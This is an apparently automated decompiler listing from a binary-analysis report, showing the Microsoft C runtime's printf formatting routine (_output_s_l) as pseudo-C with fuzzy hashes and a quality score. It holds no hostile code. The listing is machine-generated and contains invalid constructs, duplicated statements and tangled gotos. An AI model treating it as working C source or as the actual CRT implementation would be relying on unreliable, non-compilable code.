                            • Opcode Fuzzy Hash: fbe4c74e015f64c54af3eb90b61c0f23deadd203539db0b0d2051a21d28a637e
                            • Instruction Fuzzy Hash: C391A374A40204FBEB24CB44DE82F6A7376AB48704F344269F504BB2C6D2B9FE51DA5D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 65%
                            			E00421D57(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                            				signed int* _t494;
                            				signed int _t502;
                            				void* _t507;
                            				signed int _t509;
                            				void* _t529;
                            				signed int _t547;
                            				void* _t558;
                            				signed int _t567;
                            				void* _t625;
                            				void* _t626;
                            				signed int _t627;
                            				void* _t629;
                            				void* _t630;
                            
                            				L0:
                            				while(1) {
                            					L0:
                            					_t626 = __esi;
                            					_t625 = __edi;
                            					_t558 = __ebx;
                            					_t494 = E0041C290(_t627 + 0x14);
                            					_t630 = _t629 + 4;
                            					 *(_t627 - 0x298) = _t494;
                            					if(E00420F80() != 0) {
                            						goto L118;
                            					}
                            					L109:
                            					__edx = 0;
                            					if(0 == 0) {
                            						 *(__ebp - 0x32c) = 0;
                            					} else {
                            						 *(__ebp - 0x32c) = 1;
                            					}
                            					__eax =  *(__ebp - 0x32c);
                            					 *(__ebp - 0x29c) =  *(__ebp - 0x32c);
                            					if( *(__ebp - 0x29c) == 0) {
                            						_push(L"(\"\'n\' format specifier disabled\", 0)");
                            						_push(0);
                            						_push(0x695);
                            						_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            						_push(2);
                            						__eax = L0040E1A0();
                            						__esp = __esp + 0x14;
                            						if(__eax == 1) {
                            							asm("int3");
                            						}
                            					}
                            					if( *(__ebp - 0x29c) != 0) {
                            						L117:
                            						while(1) {
                            							L190:
                            							if( *(_t627 - 0x28) != 0) {
                            								goto L216;
                            							}
                            							L191:
                            							if(( *(_t627 - 0x10) & 0x00000040) != 0) {
                            								if(( *(_t627 - 0x10) & 0x00000100) == 0) {
                            									if(( *(_t627 - 0x10) & 0x00000001) == 0) {
                            										if(( *(_t627 - 0x10) & 0x00000002) != 0) {
                            											 *((char*)(_t627 - 0x14)) = 0x20;
                            											 *(_t627 - 0x1c) = 1;
                            										}
                            									} else {
                            										 *((char*)(_t627 - 0x14)) = 0x2b;
                            										 *(_t627 - 0x1c) = 1;
                            									}
                            								} else {
                            									 *((char*)(_t627 - 0x14)) = 0x2d;
                            									 *(_t627 - 0x1c) = 1;
                            								}
                            							}
                            							 *((intOrPtr*)(_t627 - 0x2c4)) =  *((intOrPtr*)(_t627 - 0x18)) -  *(_t627 - 0x24) -  *(_t627 - 0x1c);
                            							if(( *(_t627 - 0x10) & 0x0000000c) == 0) {
                            								E00422790(0x20,  *((intOrPtr*)(_t627 - 0x2c4)),  *((intOrPtr*)(_t627 + 8)), _t627 - 0x24c);
                            								_t630 = _t630 + 0x10;
                            							}
                            							E004227D0( *(_t627 - 0x1c), _t627 - 0x14,  *(_t627 - 0x1c),  *((intOrPtr*)(_t627 + 8)), _t627 - 0x24c);
                            							_t630 = _t630 + 0x10;
                            							if(( *(_t627 - 0x10) & 0x00000008) != 0) {
                            								if(( *(_t627 - 0x10) & 0x00000004) == 0) {
                            									E00422790(0x30,  *((intOrPtr*)(_t627 - 0x2c4)),  *((intOrPtr*)(_t627 + 8)), _t627 - 0x24c);
                            									_t630 = _t630 + 0x10;
                            								}
                            							}
                            							if( *(_t627 - 0xc) == 0) {
                            								L212:
                            								E004227D0( *((intOrPtr*)(_t627 - 4)),  *((intOrPtr*)(_t627 - 4)),  *(_t627 - 0x24),  *((intOrPtr*)(_t627 + 8)), _t627 - 0x24c);
                            								_t630 = _t630 + 0x10;
                            								goto L213;
                            							} else {
                            								L204:
                            								if( *(_t627 - 0x24) <= 0) {
                            									goto L212;
                            								}
                            								L205:
                            								 *(_t627 - 0x2dc) = 0;
                            								 *((intOrPtr*)(_t627 - 0x2c8)) =  *((intOrPtr*)(_t627 - 4));
                            								 *(_t627 - 0x2cc) =  *(_t627 - 0x24);
                            								while(1) {
                            									L206:
                            									 *(_t627 - 0x2cc) =  *(_t627 - 0x2cc) - 1;
                            									if( *(_t627 - 0x2cc) == 0) {
                            										break;
                            									}
                            									L207:
                            									 *(_t627 - 0x32e) =  *((intOrPtr*)( *((intOrPtr*)(_t627 - 0x2c8))));
                            									_t547 = E004212A0(_t627 - 0x2d0, _t627 - 0x2d8, 6,  *(_t627 - 0x32e) & 0x0000ffff);
                            									_t630 = _t630 + 0x10;
                            									 *(_t627 - 0x2dc) = _t547;
                            									 *((intOrPtr*)(_t627 - 0x2c8)) =  *((intOrPtr*)(_t627 - 0x2c8)) + 2;
                            									if( *(_t627 - 0x2dc) != 0) {
                            										L209:
                            										 *(_t627 - 0x24c) = 0xffffffff;
                            										break;
                            									}
                            									L208:
                            									if( *(_t627 - 0x2d0) != 0) {
                            										L210:
                            										E004227D0( *((intOrPtr*)(_t627 + 8)), _t627 - 0x2d8,  *(_t627 - 0x2d0),  *((intOrPtr*)(_t627 + 8)), _t627 - 0x24c);
                            										_t630 = _t630 + 0x10;
                            										continue;
                            									}
                            									goto L209;
                            								}
                            								L211:
                            								L213:
                            								if( *(_t627 - 0x24c) >= 0) {
                            									if(( *(_t627 - 0x10) & 0x00000004) != 0) {
                            										E00422790(0x20,  *((intOrPtr*)(_t627 - 0x2c4)),  *((intOrPtr*)(_t627 + 8)), _t627 - 0x24c);
                            										_t630 = _t630 + 0x10;
                            									}
                            								}
                            							}
                            							L216:
                            							if( *(_t627 - 0x20) != 0) {
                            								L0040C240( *(_t627 - 0x20), 2);
                            								_t630 = _t630 + 8;
                            								 *(_t627 - 0x20) = 0;
                            							}
                            							while(1) {
                            								L218:
                            								 *(_t627 - 0x251) =  *( *(_t627 + 0xc));
                            								_t598 =  *(_t627 - 0x251);
                            								 *(_t627 + 0xc) =  *(_t627 + 0xc) + 1;
                            								if( *(_t627 - 0x251) == 0 ||  *(_t627 - 0x24c) < 0) {
                            									break;
                            								} else {
                            									if( *(_t627 - 0x251) < 0x20 ||  *(_t627 - 0x251) > 0x78) {
                            										 *(_t627 - 0x310) = 0;
                            									} else {
                            										 *(_t627 - 0x310) =  *( *(_t627 - 0x251) + L"pecifier\", 0)") & 0xf;
                            									}
                            								}
                            								L7:
                            								 *(_t627 - 0x250) =  *(_t627 - 0x310);
                            								_t509 =  *(_t627 - 0x250) * 9;
                            								_t567 =  *(_t627 - 0x25c);
                            								_t598 = ( *(_t509 + _t567 + 0x4083d0) & 0x000000ff) >> 4;
                            								 *(_t627 - 0x25c) = ( *(_t509 + _t567 + 0x4083d0) & 0x000000ff) >> 4;
                            								if( *(_t627 - 0x25c) != 8) {
                            									L16:
                            									 *(_t627 - 0x318) =  *(_t627 - 0x25c);
                            									if( *(_t627 - 0x318) > 7) {
                            										continue;
                            									}
                            									L17:
                            									switch( *((intOrPtr*)( *(_t627 - 0x318) * 4 +  &M004225E0))) {
                            										case 0:
                            											L18:
                            											 *(_t627 - 0xc) = 0;
                            											_t512 = E00419390( *(_t627 - 0x251) & 0x000000ff, E0040D3B0(_t627 - 0x40));
                            											_t633 = _t630 + 8;
                            											__eflags = _t512;
                            											if(_t512 == 0) {
                            												L24:
                            												E004226F0( *(_t627 - 0x251) & 0x000000ff,  *(_t627 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t627 + 8)), _t627 - 0x24c);
                            												_t630 = _t633 + 0xc;
                            												goto L218;
                            											} else {
                            												E004226F0( *((intOrPtr*)(_t627 + 8)),  *(_t627 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t627 + 8)), _t627 - 0x24c);
                            												_t633 = _t633 + 0xc;
                            												_t572 =  *( *(_t627 + 0xc));
                            												 *(_t627 - 0x251) =  *( *(_t627 + 0xc));
                            												_t598 =  *(_t627 + 0xc) + 1;
                            												__eflags = _t598;
                            												 *(_t627 + 0xc) = _t598;
                            												asm("sbb eax, eax");
                            												 *(_t627 - 0x27c) =  ~( ~( *(_t627 - 0x251)));
                            												if(_t598 == 0) {
                            													_push(L"(ch != _T(\'\\0\'))");
                            													_push(0);
                            													_push(0x486);
                            													_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            													_push(2);
                            													_t524 = L0040E1A0();
                            													_t633 = _t633 + 0x14;
                            													__eflags = _t524 - 1;
                            													if(_t524 == 1) {
                            														asm("int3");
                            													}
                            												}
                            												L22:
                            												__eflags =  *(_t627 - 0x27c);
                            												if( *(_t627 - 0x27c) != 0) {
                            													goto L24;
                            												} else {
                            													 *((intOrPtr*)(L0040EC70(_t572))) = 0x16;
                            													E00411A50(_t558, _t572, _t625, _t626, L"(ch != _T(\'\\0\'))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x486, 0);
                            													 *(_t627 - 0x2f4) = 0xffffffff;
                            													E0040D380(_t627 - 0x40);
                            													_t502 =  *(_t627 - 0x2f4);
                            													goto L229;
                            												}
                            											}
                            										case 1:
                            											L25:
                            											 *(__ebp - 0x2c) = 0;
                            											__edx =  *(__ebp - 0x2c);
                            											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                            											__eax =  *(__ebp - 0x28);
                            											 *(__ebp - 0x18) =  *(__ebp - 0x28);
                            											__ecx =  *(__ebp - 0x18);
                            											 *(__ebp - 0x1c) = __ecx;
                            											 *(__ebp - 0x10) = 0;
                            											 *(__ebp - 0x30) = 0xffffffff;
                            											 *(__ebp - 0xc) = 0;
                            											goto L218;
                            										case 2:
                            											L26:
                            											__edx =  *((char*)(__ebp - 0x251));
                            											 *(__ebp - 0x31c) =  *((char*)(__ebp - 0x251));
                            											 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
                            											 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
                            											__eflags =  *(__ebp - 0x31c) - 0x10;
                            											if( *(__ebp - 0x31c) > 0x10) {
                            												goto L33;
                            											}
                            											L27:
                            											__ecx =  *(__ebp - 0x31c);
                            											_t73 = __ecx + 0x422618; // 0x498d04
                            											__edx =  *_t73 & 0x000000ff;
                            											switch( *((intOrPtr*)(( *_t73 & 0x000000ff) * 4 +  &M00422600))) {
                            												case 0:
                            													goto L30;
                            												case 1:
                            													goto L31;
                            												case 2:
                            													goto L29;
                            												case 3:
                            													goto L28;
                            												case 4:
                            													goto L32;
                            												case 5:
                            													goto L33;
                            											}
                            										case 3:
                            											L34:
                            											__edx =  *((char*)(__ebp - 0x251));
                            											__eflags =  *((char*)(__ebp - 0x251)) - 0x2a;
                            											if( *((char*)(__ebp - 0x251)) != 0x2a) {
                            												__eax =  *(__ebp - 0x18);
                            												__eax =  *(__ebp - 0x18) * 0xa;
                            												__eflags = __eax;
                            												__ecx =  *((char*)(__ebp - 0x251));
                            												_t97 = __ecx - 0x30; // -48
                            												__edx = __eax + _t97;
                            												 *(__ebp - 0x18) = __eax + _t97;
                            											} else {
                            												__eax = __ebp + 0x14;
                            												 *(__ebp - 0x18) = E0041C290(__ebp + 0x14);
                            												__eflags =  *(__ebp - 0x18);
                            												if( *(__ebp - 0x18) < 0) {
                            													__ecx =  *(__ebp - 0x10);
                            													__ecx =  *(__ebp - 0x10) | 0x00000004;
                            													__eflags = __ecx;
                            													 *(__ebp - 0x10) = __ecx;
                            													 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
                            													 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
                            												}
                            											}
                            											goto L218;
                            										case 4:
                            											L40:
                            											 *(__ebp - 0x30) = 0;
                            											goto L218;
                            										case 5:
                            											L41:
                            											__eax =  *((char*)(__ebp - 0x251));
                            											__eflags =  *((char*)(__ebp - 0x251)) - 0x2a;
                            											if( *((char*)(__ebp - 0x251)) != 0x2a) {
                            												__edx =  *(__ebp - 0x30);
                            												__edx =  *(__ebp - 0x30) * 0xa;
                            												__eflags = __edx;
                            												_t108 =  *((char*)(__ebp - 0x251)) - 0x30; // -48
                            												__ecx = __edx + _t108;
                            												 *(__ebp - 0x30) = __ecx;
                            											} else {
                            												__ecx = __ebp + 0x14;
                            												 *(__ebp - 0x30) = E0041C290(__ebp + 0x14);
                            												__eflags =  *(__ebp - 0x30);
                            												if( *(__ebp - 0x30) < 0) {
                            													 *(__ebp - 0x30) = 0xffffffff;
                            												}
                            											}
                            											goto L218;
                            										case 6:
                            											L47:
                            											__edx =  *((char*)(__ebp - 0x251));
                            											 *(__ebp - 0x320) =  *((char*)(__ebp - 0x251));
                            											 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
                            											 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
                            											__eflags =  *(__ebp - 0x320) - 0x2e;
                            											if( *(__ebp - 0x320) > 0x2e) {
                            												L70:
                            												goto L218;
                            											}
                            											L48:
                            											__ecx =  *(__ebp - 0x320);
                            											_t116 = __ecx + 0x422640; // 0x1e4e9003
                            											__edx =  *_t116 & 0x000000ff;
                            											switch( *((intOrPtr*)(( *_t116 & 0x000000ff) * 4 +  &M0042262C))) {
                            												case 0:
                            													L53:
                            													__edx =  *(__ebp + 0xc);
                            													__eax =  *( *(__ebp + 0xc));
                            													__eflags =  *( *(__ebp + 0xc)) - 0x36;
                            													if( *( *(__ebp + 0xc)) != 0x36) {
                            														L56:
                            														__edx =  *(__ebp + 0xc);
                            														__eax =  *( *(__ebp + 0xc));
                            														__eflags =  *( *(__ebp + 0xc)) - 0x33;
                            														if( *( *(__ebp + 0xc)) != 0x33) {
                            															L59:
                            															__edx =  *(__ebp + 0xc);
                            															__eax =  *( *(__ebp + 0xc));
                            															__eflags =  *( *(__ebp + 0xc)) - 0x64;
                            															if( *( *(__ebp + 0xc)) == 0x64) {
                            																L65:
                            																L67:
                            																goto L70;
                            															}
                            															L60:
                            															__ecx =  *(__ebp + 0xc);
                            															__edx =  *__ecx;
                            															__eflags =  *__ecx - 0x69;
                            															if( *__ecx == 0x69) {
                            																goto L65;
                            															}
                            															L61:
                            															__eax =  *(__ebp + 0xc);
                            															__ecx =  *( *(__ebp + 0xc));
                            															__eflags = __ecx - 0x6f;
                            															if(__ecx == 0x6f) {
                            																goto L65;
                            															}
                            															L62:
                            															__edx =  *(__ebp + 0xc);
                            															__eax =  *( *(__ebp + 0xc));
                            															__eflags =  *( *(__ebp + 0xc)) - 0x75;
                            															if( *( *(__ebp + 0xc)) == 0x75) {
                            																goto L65;
                            															}
                            															L63:
                            															__ecx =  *(__ebp + 0xc);
                            															__edx =  *__ecx;
                            															__eflags =  *__ecx - 0x78;
                            															if( *__ecx == 0x78) {
                            																goto L65;
                            															}
                            															L64:
                            															__eax =  *(__ebp + 0xc);
                            															__ecx =  *( *(__ebp + 0xc));
                            															__eflags = __ecx - 0x58;
                            															if(__ecx != 0x58) {
                            																 *(__ebp - 0x25c) = 0;
                            																goto L18;
                            															}
                            															goto L65;
                            														}
                            														L57:
                            														__ecx =  *(__ebp + 0xc);
                            														__edx =  *((char*)(__ecx + 1));
                            														__eflags =  *((char*)(__ecx + 1)) - 0x32;
                            														if( *((char*)(__ecx + 1)) != 0x32) {
                            															goto L59;
                            														} else {
                            															 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
                            															 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
                            															__ecx =  *(__ebp - 0x10);
                            															__ecx =  *(__ebp - 0x10) & 0xffff7fff;
                            															 *(__ebp - 0x10) = __ecx;
                            															goto L67;
                            														}
                            													}
                            													L54:
                            													__ecx =  *(__ebp + 0xc);
                            													__edx =  *((char*)(__ecx + 1));
                            													__eflags =  *((char*)(__ecx + 1)) - 0x34;
                            													if( *((char*)(__ecx + 1)) != 0x34) {
                            														goto L56;
                            													} else {
                            														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
                            														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
                            														__ecx =  *(__ebp - 0x10);
                            														__ecx =  *(__ebp - 0x10) | 0x00008000;
                            														 *(__ebp - 0x10) = __ecx;
                            														goto L67;
                            													}
                            												case 1:
                            													L68:
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
                            													goto L70;
                            												case 2:
                            													L49:
                            													__eax =  *(__ebp + 0xc);
                            													__ecx =  *( *(__ebp + 0xc));
                            													__eflags = __ecx - 0x6c;
                            													if(__ecx != 0x6c) {
                            														__ecx =  *(__ebp - 0x10);
                            														__ecx =  *(__ebp - 0x10) | 0x00000010;
                            														__eflags = __ecx;
                            														 *(__ebp - 0x10) = __ecx;
                            													} else {
                            														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
                            														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
                            													}
                            													goto L70;
                            												case 3:
                            													L69:
                            													__eax =  *(__ebp - 0x10);
                            													__eax =  *(__ebp - 0x10) | 0x00000800;
                            													__eflags = __eax;
                            													 *(__ebp - 0x10) = __eax;
                            													goto L70;
                            												case 4:
                            													goto L70;
                            											}
                            										case 7:
                            											L71:
                            											__ecx =  *((char*)(__ebp - 0x251));
                            											 *(__ebp - 0x324) = __ecx;
                            											 *(__ebp - 0x324) =  *(__ebp - 0x324) - 0x41;
                            											 *(__ebp - 0x324) =  *(__ebp - 0x324) - 0x41;
                            											__eflags =  *(__ebp - 0x324) - 0x37;
                            											if( *(__ebp - 0x324) > 0x37) {
                            												goto L190;
                            												do {
                            													do {
                            														while(1) {
                            															L190:
                            															if( *(_t627 - 0x28) != 0) {
                            																goto L216;
                            															}
                            															goto L191;
                            														}
                            														L186:
                            														__ebp - 0x49 = __ebp - 0x49 -  *(__ebp - 4);
                            														 *(__ebp - 0x24) = __ebp - 0x49 -  *(__ebp - 4);
                            														__ecx =  *(__ebp - 4);
                            														__ecx =  *(__ebp - 4) + 1;
                            														 *(__ebp - 4) = __ecx;
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000200;
                            														__eflags =  *(__ebp - 0x10) & 0x00000200;
                            													} while (( *(__ebp - 0x10) & 0x00000200) == 0);
                            													__eflags =  *(__ebp - 0x24);
                            													if( *(__ebp - 0x24) == 0) {
                            														break;
                            													}
                            													L188:
                            													__eax =  *(__ebp - 4);
                            													__ecx =  *( *(__ebp - 4));
                            													__eflags = __ecx - 0x30;
                            												} while (__ecx == 0x30);
                            												L189:
                            												 *(__ebp - 4) =  *(__ebp - 4) - 1;
                            												 *(__ebp - 4) =  *(__ebp - 4) - 1;
                            												__eax =  *(__ebp - 4);
                            												 *( *(__ebp - 4)) = 0x30;
                            												__ecx =  *(__ebp - 0x24);
                            												__ecx =  *(__ebp - 0x24) + 1;
                            												__eflags = __ecx;
                            												 *(__ebp - 0x24) = __ecx;
                            												while(1) {
                            													L190:
                            													if( *(_t627 - 0x28) != 0) {
                            														goto L216;
                            													}
                            													goto L191;
                            												}
                            											}
                            											L72:
                            											_t157 =  *(__ebp - 0x324) + 0x4226ac; // 0xcccccc0d
                            											__ecx =  *_t157 & 0x000000ff;
                            											switch( *((intOrPtr*)(__ecx * 4 +  &M00422670))) {
                            												case 0:
                            													L122:
                            													 *(__ebp - 0x2c) = 1;
                            													__ecx =  *((char*)(__ebp - 0x251));
                            													__ecx =  *((char*)(__ebp - 0x251)) + 0x20;
                            													__eflags = __ecx;
                            													 *((char*)(__ebp - 0x251)) = __cl;
                            													goto L123;
                            												case 1:
                            													L73:
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
                            													__eflags =  *(__ebp - 0x10) & 0x00000830;
                            													if(( *(__ebp - 0x10) & 0x00000830) == 0) {
                            														__eax =  *(__ebp - 0x10);
                            														__eax =  *(__ebp - 0x10) | 0x00000800;
                            														__eflags = __eax;
                            														 *(__ebp - 0x10) = __eax;
                            													}
                            													goto L75;
                            												case 2:
                            													L88:
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
                            													__eflags =  *(__ebp - 0x10) & 0x00000830;
                            													if(( *(__ebp - 0x10) & 0x00000830) == 0) {
                            														__ecx =  *(__ebp - 0x10);
                            														__ecx =  *(__ebp - 0x10) | 0x00000800;
                            														__eflags = __ecx;
                            														 *(__ebp - 0x10) = __ecx;
                            													}
                            													goto L90;
                            												case 3:
                            													L146:
                            													 *(__ebp - 0x260) = 7;
                            													goto L148;
                            												case 4:
                            													L81:
                            													__eax = __ebp + 0x14;
                            													 *(__ebp - 0x288) = E0041C290(__ebp + 0x14);
                            													__eflags =  *(__ebp - 0x288);
                            													if( *(__ebp - 0x288) == 0) {
                            														L83:
                            														__edx =  *0x60b4f0; // 0x407424
                            														 *(__ebp - 4) = __edx;
                            														__eax =  *(__ebp - 4);
                            														 *(__ebp - 0x24) = E0040DC40( *(__ebp - 4));
                            														L87:
                            														goto L190;
                            													}
                            													L82:
                            													__ecx =  *(__ebp - 0x288);
                            													__eflags =  *(__ecx + 4);
                            													if( *(__ecx + 4) != 0) {
                            														L84:
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
                            														__eflags =  *(__ebp - 0x10) & 0x00000800;
                            														if(( *(__ebp - 0x10) & 0x00000800) == 0) {
                            															 *(__ebp - 0xc) = 0;
                            															__edx =  *(__ebp - 0x288);
                            															__eax =  *(__edx + 4);
                            															 *(__ebp - 4) =  *(__edx + 4);
                            															__ecx =  *(__ebp - 0x288);
                            															__edx =  *__ecx;
                            															 *(__ebp - 0x24) =  *__ecx;
                            														} else {
                            															__edx =  *(__ebp - 0x288);
                            															__eax =  *(__edx + 4);
                            															 *(__ebp - 4) =  *(__edx + 4);
                            															__ecx =  *(__ebp - 0x288);
                            															__eax =  *__ecx;
                            															asm("cdq");
                            															 *__ecx - __edx =  *__ecx - __edx >> 1;
                            															 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
                            															 *(__ebp - 0xc) = 1;
                            														}
                            														goto L87;
                            													}
                            													goto L83;
                            												case 5:
                            													L123:
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            													__eax = __ebp - 0x248;
                            													 *(__ebp - 4) = __ebp - 0x248;
                            													 *(__ebp - 0x44) = 0x200;
                            													__eflags =  *(__ebp - 0x30);
                            													if( *(__ebp - 0x30) >= 0) {
                            														L125:
                            														__eflags =  *(__ebp - 0x30);
                            														if( *(__ebp - 0x30) != 0) {
                            															L128:
                            															__eflags =  *(__ebp - 0x30) - 0x200;
                            															if( *(__ebp - 0x30) > 0x200) {
                            																 *(__ebp - 0x30) = 0x200;
                            															}
                            															L130:
                            															__eflags =  *(__ebp - 0x30) - 0xa3;
                            															if( *(__ebp - 0x30) > 0xa3) {
                            																 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
                            																 *(__ebp - 0x20) = L0040B5C0(__ecx,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
                            																__eflags =  *(__ebp - 0x20);
                            																if( *(__ebp - 0x20) == 0) {
                            																	 *(__ebp - 0x30) = 0xa3;
                            																} else {
                            																	__eax =  *(__ebp - 0x20);
                            																	 *(__ebp - 4) =  *(__ebp - 0x20);
                            																	 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
                            																	 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
                            																}
                            															}
                            															 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
                            															 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
                            															__eax =  *(__ebp + 0x14);
                            															__ecx =  *(__eax - 8);
                            															__edx =  *(__eax - 4);
                            															 *(__ebp - 0x2a8) =  *(__eax - 8);
                            															 *(__ebp - 0x2a4) =  *(__eax - 4);
                            															__ecx = __ebp - 0x40;
                            															_push(E0040D3B0(__ebp - 0x40));
                            															__eax =  *(__ebp - 0x2c);
                            															_push( *(__ebp - 0x2c));
                            															__ecx =  *(__ebp - 0x30);
                            															_push( *(__ebp - 0x30));
                            															__edx =  *((char*)(__ebp - 0x251));
                            															_push( *((char*)(__ebp - 0x251)));
                            															__eax =  *(__ebp - 0x44);
                            															_push( *(__ebp - 0x44));
                            															__ecx =  *(__ebp - 4);
                            															_push( *(__ebp - 4));
                            															__edx = __ebp - 0x2a8;
                            															_push(__ebp - 0x2a8);
                            															__eax =  *0x60b3cc; // 0x7e8c4bdb
                            															__eax =  *__eax();
                            															__esp = __esp + 0x1c;
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            															__eflags =  *(__ebp - 0x10) & 0x00000080;
                            															if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            																__eflags =  *(__ebp - 0x30);
                            																if( *(__ebp - 0x30) == 0) {
                            																	__ecx = __ebp - 0x40;
                            																	_push(E0040D3B0(__ebp - 0x40));
                            																	__edx =  *(__ebp - 4);
                            																	_push( *(__ebp - 4));
                            																	__eax =  *0x60b3d8; // 0x7e8c4bdb
                            																	__eax =  *__eax();
                            																	__esp = __esp + 8;
                            																}
                            															}
                            															__ecx =  *((char*)(__ebp - 0x251));
                            															__eflags =  *((char*)(__ebp - 0x251)) - 0x67;
                            															if( *((char*)(__ebp - 0x251)) == 0x67) {
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																__eflags =  *(__ebp - 0x10) & 0x00000080;
                            																if(( *(__ebp - 0x10) & 0x00000080) == 0) {
                            																	__ecx = __ebp - 0x40;
                            																	_push(E0040D3B0(__ebp - 0x40));
                            																	__eax =  *(__ebp - 4);
                            																	_push( *(__ebp - 4));
                            																	__ecx =  *0x60b3d4; // 0x7e8c4bdb
                            																	E00410200(__ecx) =  *__eax();
                            																	__esp = __esp + 8;
                            																}
                            															}
                            															__edx =  *(__ebp - 4);
                            															__eax =  *( *(__ebp - 4));
                            															__eflags =  *( *(__ebp - 4)) - 0x2d;
                            															if( *( *(__ebp - 4)) == 0x2d) {
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            																__edx =  *(__ebp - 4);
                            																__edx =  *(__ebp - 4) + 1;
                            																__eflags = __edx;
                            																 *(__ebp - 4) = __edx;
                            															}
                            															__eax =  *(__ebp - 4);
                            															 *(__ebp - 0x24) = E0040DC40( *(__ebp - 4));
                            															do {
                            																L190:
                            																if( *(_t627 - 0x28) != 0) {
                            																	goto L216;
                            																}
                            																goto L191;
                            															} while ( *(__ebp - 0x324) > 0x37);
                            															goto L72;
                            														}
                            														L126:
                            														__ecx =  *((char*)(__ebp - 0x251));
                            														__eflags = __ecx - 0x67;
                            														if(__ecx != 0x67) {
                            															goto L128;
                            														}
                            														L127:
                            														 *(__ebp - 0x30) = 1;
                            														goto L130;
                            													}
                            													L124:
                            													 *(__ebp - 0x30) = 6;
                            													goto L130;
                            												case 6:
                            													L75:
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
                            													__eflags =  *(__ebp - 0x10) & 0x00000810;
                            													if(( *(__ebp - 0x10) & 0x00000810) == 0) {
                            														__ebp + 0x14 = E0041C290(__ebp + 0x14);
                            														 *(__ebp - 0x284) = __ax;
                            														__cl =  *(__ebp - 0x284);
                            														 *(__ebp - 0x248) = __cl;
                            														 *(__ebp - 0x24) = 1;
                            													} else {
                            														 *(__ebp - 0x280) = 0;
                            														__edx = __ebp + 0x14;
                            														__eax = E0041C2D0(__ebp + 0x14);
                            														 *(__ebp - 0x258) = __ax;
                            														__eax =  *(__ebp - 0x258) & 0x0000ffff;
                            														__ecx = __ebp - 0x248;
                            														__edx = __ebp - 0x24;
                            														 *(__ebp - 0x280) = E004212A0(__ebp - 0x24, __ebp - 0x248, 0x200,  *(__ebp - 0x258) & 0x0000ffff);
                            														__eflags =  *(__ebp - 0x280);
                            														if( *(__ebp - 0x280) != 0) {
                            															 *(__ebp - 0x28) = 1;
                            														}
                            													}
                            													__edx = __ebp - 0x248;
                            													 *(__ebp - 4) = __ebp - 0x248;
                            													while(1) {
                            														L190:
                            														if( *(_t627 - 0x28) != 0) {
                            															goto L216;
                            														}
                            														goto L191;
                            													}
                            												case 7:
                            													L143:
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            													 *(__ebp - 8) = 0xa;
                            													goto L153;
                            												case 8:
                            													goto L0;
                            												case 9:
                            													L151:
                            													 *(__ebp - 8) = 8;
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            													__eflags =  *(__ebp - 0x10) & 0x00000080;
                            													if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            														__edx =  *(__ebp - 0x10);
                            														__edx =  *(__ebp - 0x10) | 0x00000200;
                            														__eflags = __edx;
                            														 *(__ebp - 0x10) = __edx;
                            													}
                            													goto L153;
                            												case 0xa:
                            													L145:
                            													 *(__ebp - 0x30) = 8;
                            													goto L146;
                            												case 0xb:
                            													L90:
                            													__eflags =  *(__ebp - 0x30) - 0xffffffff;
                            													if( *(__ebp - 0x30) != 0xffffffff) {
                            														__edx =  *(__ebp - 0x30);
                            														 *(__ebp - 0x328) =  *(__ebp - 0x30);
                            													} else {
                            														 *(__ebp - 0x328) = 0x7fffffff;
                            													}
                            													__eax =  *(__ebp - 0x328);
                            													 *(__ebp - 0x290) =  *(__ebp - 0x328);
                            													__ecx = __ebp + 0x14;
